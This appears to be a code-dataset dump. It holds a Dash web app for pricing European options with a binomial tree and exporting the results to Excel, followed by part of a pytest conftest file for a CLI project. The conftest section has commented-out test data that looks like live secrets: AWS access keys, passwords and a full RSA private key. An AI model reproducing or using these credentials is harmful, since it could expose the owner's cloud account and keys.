| 1
| 0.066038
| false
| 0
| 0.009434
| 0
| 0.198113
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be0d5dc3943b29ff4333db5245561705074c34cf
| 34,296
|
py
|
Python
|
app.py
|
MichelVanderhulst/eu-option-crr
|
718d73d336289368c6f10bf97805bf12e6c6ec6f
|
[
"MIT"
] | null | null | null |
app.py
|
MichelVanderhulst/eu-option-crr
|
718d73d336289368c6f10bf97805bf12e6c6ec6f
|
[
"MIT"
] | null | null | null |
app.py
|
MichelVanderhulst/eu-option-crr
|
718d73d336289368c6f10bf97805bf12e6c6ec6f
|
[
"MIT"
] | null | null | null |
# Dash app libraries
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
import dash_bootstrap_components as dbc
import plotly.graph_objs as go
import base64
# Importing app header, body and graphs from the other .py scripts
from appBody import body, graphs
from appHeader import header
# Rep strat math script
from EU_Option_CRR_GRW import *
from inputDescriptions import list_input
# Allowing excel export
import os
import io
import numpy as np  # np.array / np.arange are used directly in generate_xlsx below
import pandas as pd
from dash_extensions import Download
from dash_extensions.snippets import send_bytes
app = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP], #modern-looking buttons, sliders, etc
external_scripts=['https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML', "./assets/mathjax.js"], #LaTeX in app
meta_tags=[{"content": "width=device-width"}] #app width adapts itself to user device
)
server = app.server
# Building the app from imports
app.layout = html.Div(
id='main_page',
children=[
dcc.Store(id='memory-output'),
header(),
body(),
graphs(),
],
)
# App interactivity: calling the replication strategy function every time the user changes an input
@app.callback(
Output('memory-output', 'data'),
[Input('CallOrPut', 'value'),
Input("S","value"),
Input("K", "value"),
Input("Rf", "value"),
Input("T","value"),
Input("mu","value"),
Input("vol", "value"),
Input("tree_periods", "value")])
def get_rep_strat_data(CallOrPut, S, K, Rf,T,mu,vol,tree_periods):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = RepStrat_EU_Option_CRR_GRW(CallOrPut, S, K, Rf, T, mu, vol, tree_periods)
return nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods
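# dcc.Store serialises this tuple to JSON, so downstream callbacks receive plain
# lists/numbers rather than numpy arrays; generate_xlsx below rebuilds arrays with
# np.array before slicing them into per-period columns.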
# Plot of stock simulation
@app.callback(
Output('stock_simul', 'figure'),
[Input('memory-output', 'data'),
Input("GraphType","value")])
def graph_stock_simul(data, value):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = data
if value == "tree":
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
#margin={"t":15},
margin=dict(
l=0,
#r=50,
#b=100,
t=15,
#pad=4
),
# showlegend=False,
xaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,}, # numbers below}
yaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,}, # numbers below}
legend=dict(
x=0,
y=1,
traceorder='normal',
bgcolor='rgba(0,0,0,0)'),
),
'data': [go.Scatter(x=edge_x,
y=edge_y,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
showlegend=False,
),
go.Scatter(
x=node_x,
y=node_y,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in stocksLabel],
showlegend=False,
hoverinfo='none',
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Up factor: {u}'
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Down factor: {d}'
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Prob up: {probUp}'
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Prob down: {probDown}'
),
],
}
else:
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
margin=dict(l=0, t=15),
xaxis={'showgrid': True,
'zeroline': False,
'visible': True,
"title":"Periods"},
yaxis={'showgrid': True, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': True,
"autorange":True,
"ticks":"outside",
"title":"USD"}, # numbers below}
legend=dict(x=0,
y=1,
traceorder='normal',
bgcolor='rgba(0,0,0,0)'
),
hovermode="closest",
),
'data': [go.Scatter(x=edge_x,
y=edge_y_Stock,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
showlegend=False,
),
go.Scatter(x=node_x,
y=node_y_Stock,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in stocksLabel],
showlegend=False,
hoverinfo="none",
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Up factor: {u}'
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Down factor: {d}'
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Prob up: {probUp}'
),
go.Scatter(
x=[None],
y=[None],
mode='markers',
name=f'Prob down: {probDown}'
),
],
}
# Plot of rep strat portfolio
@app.callback(
Output('port_details', 'figure'),
[Input('memory-output', 'data'),
Input("GraphType","value")])
def graph_portfolio(data, value):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = data
if value == "tree":
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
showlegend=False,
margin=dict(
l=0,
#r=50,
#b=100,
t=15,
#pad=4
),
xaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"Periods"}, # numbers below}
yaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"USD"}, # numbers below}} # numbers below}
),
'data': [go.Scatter(x=edge_x,
y=edge_y,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
),
go.Scatter(x=node_x,
y=node_y,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in portfolioLabel],
hoverinfo='none',
),
],
}
else:
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
margin=dict(l=0, t=15),
xaxis={'showgrid': True,
'zeroline': False,
'visible': True,
"title":"Periods"},
yaxis={'showgrid': True, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': True,
"autorange":True,
"ticks":"outside",
"title":"USD"}, # numbers below}
legend=dict(x=0,
y=1,
traceorder='normal',
bgcolor='rgba(0,0,0,0)'
),
hovermode="closest",
),
'data': [go.Scatter(x=edge_x,
y=edge_y_Portfolio,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
showlegend=False,
),
go.Scatter(x=node_x,
y=node_y_Portfolio,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in portfolioLabel],
showlegend=False,
hoverinfo="none",
),
],
}
# Plot of number of shares to hold
@app.callback(
Output('nbr_shares', 'figure'),
[Input('memory-output', 'data'),
Input("GraphType","value")])
def graph_numberShares(data, value):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = data
if value == "tree":
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
showlegend=False,
margin=dict(l=0,
#r=50,
#b=100,
t=15,
#pad=4
),
xaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"Periods"}, # numbers below}
yaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"Periods"} # numbers below}
),
'data': [go.Scatter(x=edge_x,
y=edge_y,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
),
go.Scatter(x=node_x,
y=node_y,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in nbrofsharesLabel],
hoverinfo='none',
),
],
}
else:
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
margin=dict(l=0, t=15),
xaxis={'showgrid': True,
'zeroline': False,
'visible': True,
"title":"Periods"},
yaxis={'showgrid': True, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': True,
"autorange":True,
"ticks":"outside",
"title":"# Shares"}, # numbers below}
legend=dict(x=0,
y=1,
traceorder='normal',
bgcolor='rgba(0,0,0,0)'
),
hovermode="closest",
),
'data': [go.Scatter(x=edge_x,
y=edge_y_NbrOfShares,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
showlegend=False,
),
go.Scatter(x=node_x,
y=node_y_NbrOfShares,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in nbrofsharesLabel],
showlegend=False,
hoverinfo="none",
),
],
}
# Plot of cash account
@app.callback(
Output('cash_acc', 'figure'),
[Input('memory-output', 'data'),
Input("GraphType","value")])
def graph_cashAccount(data, value):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = data
if value == "tree":
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
showlegend=False,
margin=dict(l=0,
#r=50,
#b=100,
t=15,
#pad=4
),
xaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"Periods"}, # numbers below}
yaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"USD"} # numbers below}
),
'data': [go.Scatter(x=edge_x,
y=edge_y,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
),
go.Scatter(x=node_x,
y=node_y,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in cashLabel],
hoverinfo='none',
),
],
}
else:
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
margin=dict(l=0, t=15),
xaxis={'showgrid': True,
'zeroline': False,
'visible': True,
"title":"Periods"},
yaxis={'showgrid': True, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': True,
"autorange":True,
"ticks":"outside",
"title":"USD"}, # numbers below}
legend=dict(x=0,
y=1,
traceorder='normal',
bgcolor='rgba(0,0,0,0)'
),
hovermode="closest",
),
'data': [go.Scatter(x=edge_x,
y=edge_y_Cash,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
showlegend=False,
),
go.Scatter(x=node_x,
y=node_y_Cash,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in cashLabel],
showlegend=False,
hoverinfo="none",
),
],
}
# Plot of option price
@app.callback(
Output('option_price', 'figure'),
[Input('memory-output', 'data'),
Input("GraphType", "value")])
def graph_option_price(data, value):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = data
if value == "tree":
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
showlegend=False,
margin=dict(l=0,
#r=50,
#b=100,
t=15,
#pad=4
),
xaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"Periods"}, # numbers below}
yaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"USD"} # numbers below}
),
'data': [go.Scatter(x=edge_x,
y=edge_y,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
),
go.Scatter(x=node_x,
y=node_y,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in optionpriceLabel],
hoverinfo='none',
),
],
}
else:
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
margin=dict(l=0, t=15),
xaxis={'showgrid': True,
'zeroline': False,
'visible': True,
"title":"Periods"},
yaxis={'showgrid': True, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': True,
"autorange":True,
"ticks":"outside",
"title":"USD"}, # numbers below}
legend=dict(x=0,
y=1,
traceorder='normal',
bgcolor='rgba(0,0,0,0)'
),
hovermode="closest",
),
'data': [go.Scatter(x=edge_x,
                             y=edge_y_Optionprice,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
showlegend=False,
),
go.Scatter(x=node_x,
y=node_y_Optionprice,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in optionpriceLabel],
showlegend=False,
hoverinfo="none",
),
],
}
# Plot of option intrinsic value
@app.callback(
Output('option_intrinsic', 'figure'),
[Input('memory-output', 'data'),
Input("GraphType", "value")])
def graph_optionIntrinsicValue(data,value):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = data
if value == "tree":
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
showlegend=False,
margin=dict(l=0,
#r=50,
#b=100,
t=15,
#pad=4
),
xaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"Periods"}, # numbers below}
yaxis={'showgrid': False, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': False,
"title":"USD"} # numbers below}
),
'data': [go.Scatter(x=edge_x,
y=edge_y,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
showlegend=False,
),
go.Scatter(x=node_x,
y=node_y,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in intrinsicLabel],
showlegend=False,
hoverinfo="none",
),
],
}
else:
return{'layout': go.Layout(title={'yref':"paper",
'y':1,
"yanchor":"bottom"},
margin=dict(l=0, t=15),
xaxis={'showgrid': True,
'zeroline': False,
'visible': True,
"title":"Periods"},
yaxis={'showgrid': True, # thin lines in the background
'zeroline': False, # thick line at x=0
'visible': True,
"autorange":True,
"ticks":"outside",
"title":"USD"}, # numbers below}
legend=dict(x=0,
y=1,
traceorder='normal',
bgcolor='rgba(0,0,0,0)'
),
hovermode="closest",
),
'data': [go.Scatter(x=edge_x,
y=edge_y_Intrinsic,
mode='lines',
line=dict(width=0.5),
hoverinfo='none',
showlegend=False,
),
go.Scatter(x=node_x,
y=node_y_Intrinsic,
mode='markers+text',
marker=dict(size=40),
text=[round(num, 2) for num in intrinsicLabel],
showlegend=False,
hoverinfo="none",
),
],
}
# User input checks
@app.callback(Output('message_S', 'children'),
[Input('S', 'value')])
def check_input_S(S):
    if S < 0:
        return 'Cannot be lower than 0.'
    else:
        return ""
@app.callback(Output('message_K', 'children'),
[Input('K', 'value')])
def check_input_K(K):
    if K < 0:
        return 'Cannot be lower than 0.'
    else:
        return ""
@app.callback(Output('message_tree', 'children'),
[Input('tree_periods', 'value')])
def check_input_tree(tree__periods):
    if tree__periods < 1:
        return 'Cannot be lower than 1.'
    else:
        return ""
# Input visuals
@app.callback(Output('drift', 'children'),
[Input('mu', 'value')])
def display_value(value):
return f': {int(value*100)}%'
@app.callback(Output('sigma', 'children'),
[Input('vol', 'value')])
def display_value2(value):
return f': {int(value*100)}%'
@app.callback(Output('riskfree', 'children'),
[Input('Rf', 'value')])
def display_value3(value):
return f': {int(value*100)}%'
@app.callback(Output('matu', 'children'),
[Input('T', 'value')])
def display_value4(value):
if value==0.25 or value==0.5 or value==0.75:
return f": {int(value*12)} months"
elif value == 1:
return f': {value} year'
else:
return f': {value} years'
# Excel export
@app.callback(Output("download", "data"),
[Input("btn", "n_clicks")],
[State('memory-output', 'data')])
def generate_xlsx(n_clicks, data):
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel, edge_x, edge_y, node_x, node_y, u, d, probUp, probDown, edge_y_Stock, node_y_Stock, edge_y_Intrinsic, node_y_Intrinsic, edge_y_Optionprice, node_y_Optionprice, edge_y_Portfolio, node_y_Portfolio, edge_y_Cash, node_y_Cash, edge_y_NbrOfShares, node_y_NbrOfShares, tree__periods = data
nbrofsharesLabel, cashLabel, portfolioLabel, optionpriceLabel, intrinsicLabel, stocksLabel = np.array(nbrofsharesLabel), np.array(cashLabel), np.array(portfolioLabel), np.array(optionpriceLabel), np.array(intrinsicLabel), np.array(stocksLabel)
list_of_outputs = (stocksLabel, intrinsicLabel, portfolioLabel, optionpriceLabel, nbrofsharesLabel, cashLabel)
list_of_names = ["Stock simulation", "Option intrinsic value", "Portfolio", "Option price", "Number of shares", "Cash account"]
endbis, startbis = [0], [0]
endstep, startstep = np.arange(2,tree__periods+2), np.arange(1,tree__periods+1)
for i in range(len(endstep)):
endbis.append(endbis[i]+endstep[i])
for i in range(len(startstep)):
startbis.append(startbis[i]+startstep[i])
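    # startbis[j]..endbis[j] are the flat-array bounds of tree level j: a recombining
    # binomial tree stores the j+1 nodes of level j contiguously at triangular-number
    # offsets (0, 1, 3, 6, ...), which is how the per-period columns are sliced below.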
    def to_xlsx(bytes_io):
        xlsx_writer = pd.ExcelWriter(bytes_io, engine="xlsxwriter")
        for name, output in zip(list_of_names, list_of_outputs):
            temp = pd.DataFrame(index=np.arange(0, tree__periods + 1))
            temp.loc[:, 0] = pd.Series(output[0])
            for j in range(1, tree__periods + 1):
                temp.loc[:, j] = pd.Series(output[startbis[j]:endbis[j] + 1])
            temp.index = np.arange(1, tree__periods + 2)
            temp.to_excel(xlsx_writer, sheet_name=name)  # one sheet per output array
        xlsx_writer.close()  # finalizes and writes the workbook to the buffer
return send_bytes(to_xlsx, "rawdata.xlsx")
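# send_bytes runs to_xlsx against an in-memory buffer and hands the resulting bytes
# to the Download component, so no temporary file is written on the server.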
# Opening/Closing top-right About button
@app.callback(
Output("popover", "is_open"),
[Input("popover-target", "n_clicks")],
[State("popover", "is_open")],
)
def toggle_popover(n, is_open):
if n:
return not is_open
return is_open
# Main function, runs the app
if __name__ == '__main__':
app.run_server(debug=True)
| 47.045267
| 445
| 0.388879
| 2,831
| 34,296
| 4.554928
| 0.106323
| 0.029081
| 0.024816
| 0.019542
| 0.764482
| 0.750213
| 0.743079
| 0.730361
| 0.730361
| 0.716402
| 0
| 0.01534
| 0.511488
| 34,296
| 728
| 446
| 47.10989
| 0.754327
| 0.054671
| 0
| 0.771028
| 0
| 0.001558
| 0.095932
| 0.000742
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02648
| false
| 0
| 0.024922
| 0.004673
| 0.076324
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
077304a77e7ead1312213100fc56049be0e888c1
| 71,801
|
py
|
Python
|
conftest.py
|
altmirai/piggycli
|
c1b1944fc03ebc220df8ca6284d46148fdf087a6
|
[
"MIT"
] | null | null | null |
conftest.py
|
altmirai/piggycli
|
c1b1944fc03ebc220df8ca6284d46148fdf087a6
|
[
"MIT"
] | null | null | null |
conftest.py
|
altmirai/piggycli
|
c1b1944fc03ebc220df8ca6284d46148fdf087a6
|
[
"MIT"
] | null | null | null |
from app.models.certificate_model import Certs
from app.models.ssh_key_model import SSHKey
from tests.data.aws_call_fixtures import *
from tests.data.model_fixtures import *
import tests.data as data
import botocore.session
from botocore.stub import Stubber, ANY
from unittest.mock import patch, Mock
import pytest
import os
def delete_files_and_folders():
cluster_folder = data.test_cluster_path
# piggy_folder = os.path.join(data.test_path, '.piggy')
test_files_folder = os.path.join(data.test_base_path)
folders = [cluster_folder, test_files_folder]
# folders = [cluster_folder, piggy_folder, test_files_folder]
for folder in folders:
if os.path.isdir(folder):
files = os.listdir(folder)
for file in files:
                assert not os.path.isdir(
                    os.path.join(folder, file)), 'Unexpected file structure.'
os.remove(os.path.join(folder, file))
os.rmdir(folder)
def pytest_sessionstart(session):
if os.path.isdir(data.test_base_path):
delete_files_and_folders()
os.mkdir(data.test_base_path)
def pytest_sessionfinish(session, exitstatus):
delete_files_and_folders()
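# pytest invokes these hooks once per test session: sessionstart recreates a clean
# test_files directory (data.test_base_path) and sessionfinish tears it down, so
# fixtures can write scratch files without leaking state between runs.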
# class CredentialsData:
# def __init__(self):
# self.test_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/tests/test_files'
# self.production_path = '/Users/kyle/GitHub/alt-piggy-bank/piggy-cli/production_files'
# self.aws_region = 'us-east-2'
# self.ssh_key_name = 'Piggy_SSH_Key_cf865bae'
# self.cluster_id = 'cluster-lbtkdldygfh'
# self.instance_id = 'i-051bdb2ae099024a5'
# self.aws_access_key_id = 'AKIA5YNNN4JH6JDQF5XH'
# self.aws_secret_access_key = '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'
# self.customer_ca_key_password = 'password1'
# self.crypto_officer_password = 'password1'
# self.crypto_user_username = 'cryptouser'
# self.crypto_user_password = 'password1'
# self.KeyFingerprint = '08:c9:28:e5:24:38:d5:ef:9b:a1:76:22:9f:00:0c:eb:47:16:59:cd'
# self.KeyMaterial = '-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEAkOrCB3e0Fj/Cv797THZn5YgxIPywNdlg284rMSshrLl8QC83\n0ck0K9CP3Y+rCuHGx7t/2tCtl66uKlwOPFvWGDi+akonkUeVqnV8U1z5jNhI8SwY\niXtcFX0twIGHaaxYQrWZvOUAnmE8JUGd7Pysy4Sy7/ZEldXwEN3fN2NIPRnQwii7\nS5tv573C2am2MMXtwEKtQi3uWgPu//maXqoM0/PuxTDk9DUKnN88nvNBMoTlHr1P\nl9QsHMPyXvJ/+TTPdVybXwMvv1KgCMeGid43CPu7SFa8trx9DuvSY03TwYyhZIp6\nMsPZot6pu+opRXgF7SkSpp/+ABPoA836sPF0+wIDAQABAoIBAAESi68Mdru3axSK\nMTpmoewz7tEkrZUob6wQwYcSn6QslzvOXaZiy80LNRVZq9VfyF3QCGkxJCe8NjPA\nDKbrsxDo0pfsxpAvrG7fgbUIOhyNuTR3tBLIY+0QyRbknoDsspaDy4h3VWLWq2BH\nNQj88bZr2/skomtNcwJc8frx9CXnmR1erB8d7UybKFiYL4ggM/MVQbdn66ZpmKCK\naZ774lbgdiwp8YZp1ANFw7zBr1MTqXKLmghtYZoornRUVk2c3OPUII62jmarUaqn\nKL+q2198j0axDsmFCAALTbmxjo//XWxwTeaRNwsi0hqeENEy1ywtidn1A8eHJaOi\nvGlV6LkCgYEA4rabAGB7OQTunGj6BiQBN8AnG/1B77HBA/VRy3YUHdPaBYtldLuX\nZrQKuE3l13uX0whXr+BQVDtDiegocz4r41/MR9uUoQFHnsL25D+A44xveT2scTHm\nBHpUprq8ti4XyNJGpnZXSxQCRzhcGnJItvfOaQWW+slEnR4RUuWCdjUCgYEAo6Mn\nmT+NyNCfJHWvF951fvRi7liktRzIcIL7Hu4gDkTTJ7U/Ms3OgQTsQ6VIfNeotAYC\nFe/GVb+SB91MnnCFwPbwt1vIwdLGvKtAUq3OQvE8Jv1LCC3XQJcRv/tJuP6lLz1t\nWNF59Uz0Ar6VN9tIctdribKGP6Dxg32OLlrV5G8CgYEAotnQlYC4gsjMLYYqsuaC\nCW35qd1N08O3hgRd8OysnpBi98Cd7DAkHR4O5TzvcM3SzUAc3LUgfqDjbthY1g8+\nr2FM+AD+zniA3cXmWyZSiyGBoXFvwQ+6zlShIfLZQ3PwmcyR+1jec4u35zjQ0B5v\npR50InRlc1fH9aR3hThfclECgYEAh+bv80GqIpbJJQGsKnmyQX78TxFFsbk26uKN\nZxHDg7Y7XCYWV74/fD23bzLtMen2DZVT1B4wLXUN9gQgJxIys6EjKFVNNVQ1g+oC\nYOhCfqxVFdiVoTRZKiaNMlGj18V9MO+mSfangEep/EGGMj6nO+GXSWQARQYIrvju\nxabhL3cCgYEAlPAbQgqljbfs6pIG5eEKHNLXaCZxFeZDQ+PQ9CYBsCL0nPo0e1iw\nHNFx2A/BN0hEZxiOO0LnDV5paFhAd+rFhSvxdgwhOBvxU1TDwcNCoyqpbJ57BB3e\n5d+ShkCu0K3LbKn65ZAtvJCB9yleu5VUIt6i+q/aaPLcWTcf+YxVDfM=\n-----END RSA PRIVATE KEY-----'
# self.KeyName = 'Piggy_SSH_Key_0194afd1'
# self.KeyPairId = 'key-0a070814c64fa0e65'
# self.KeyFingerprint2 = 'de:7b:e3:aa:81:52:89:be:a5:01:a0:87:8d:67:76:47:e8:a5:9f:0c'
# self.KeyName2 = 'Piggy_SSH_Key_40cc19f5'
# self.KeyPairId2 = 'key-071d152e1ec5428df'
# self.pem_csr = '-----BEGIN CERTIFICATE REQUEST-----\nMIIC0TCCAbkCAQAwgYsxRDAJBgNVBAYTAlVTMAkGA1UECAwCQ0EwDQYDVQQKDAZD\nYXZpdW0wDQYDVQQLDAZOM0ZJUFMwDgYDVQQHDAdTYW5Kb3NlMUMwQQYDVQQDDDpI\nU006QjRGMUU4QjY3OTY3NTg2M0Y4REIzMjExMTM2NEIzOlBBUlROOjEzLCBmb3Ig\nRklQUyBtb2RlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvDY9IZlR\nThUQ2Jfc+JWPC15WqZbMRKiEba+FICcwno+izaDza+rzpqtaU0Q5UVYGOe4vEtVj\nxsj3hdhXc2rK53vhw4EdmKojPzAy3F/TJGzSvzIlPUCdWLtbKlNEkg/VGu1YcsMV\nvQvyGFSusj8idWT4DvsZxPuEwiXE4qEPmyB1uo2lKIYWfulP9QrRdvnrBF/zBmXO\nblg3zHf1KQ8bYWW8Lc/DGcRnRvPBfDvYNS6DJPrMiM+QeqhM5Iegu7OlTOTkV72d\nmaMqTuuWOGrb6LCDr7hWGfjAE3517Jt2ia2bB8YE5Wda4mUBEmpVl5Kho547S6Sx\nMiChX3U3VCHbVwIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAKqEhDqVClGRES2C\nIwqKxPVYo5lbynEZ94qSeKzI9rgoW3kPVyro1vBxAzMwDSJd1TXmw2fJAOY7Zdiw\n+j0SMZCb81ehVNa8VRUsOrU6phC72jqUSFSWpRkCDxc9inIdUfBpqIQxsd0JpYB7\nzvyuKILMNDI3Ys7S4i1ErHv8IyDUdmVjP+qRaEAhecBEt5GVZPDg/vjEsS83hqf4\n7EZ9S9noDgnoa79W1ovFr8wW8EZ5Spi50D5hsFCMy4a4rErwneAATEm2MmtLfIy7\nCWTUET6SZN2Ncn/oM1ulVYofYTctmpiAGMMjB9joA6nW0I2QfhaSOTugU+NmwnC0\nOo+qHwM=\n-----END CERTIFICATE REQUEST-----\n'
# self.passphrase = 'password1'
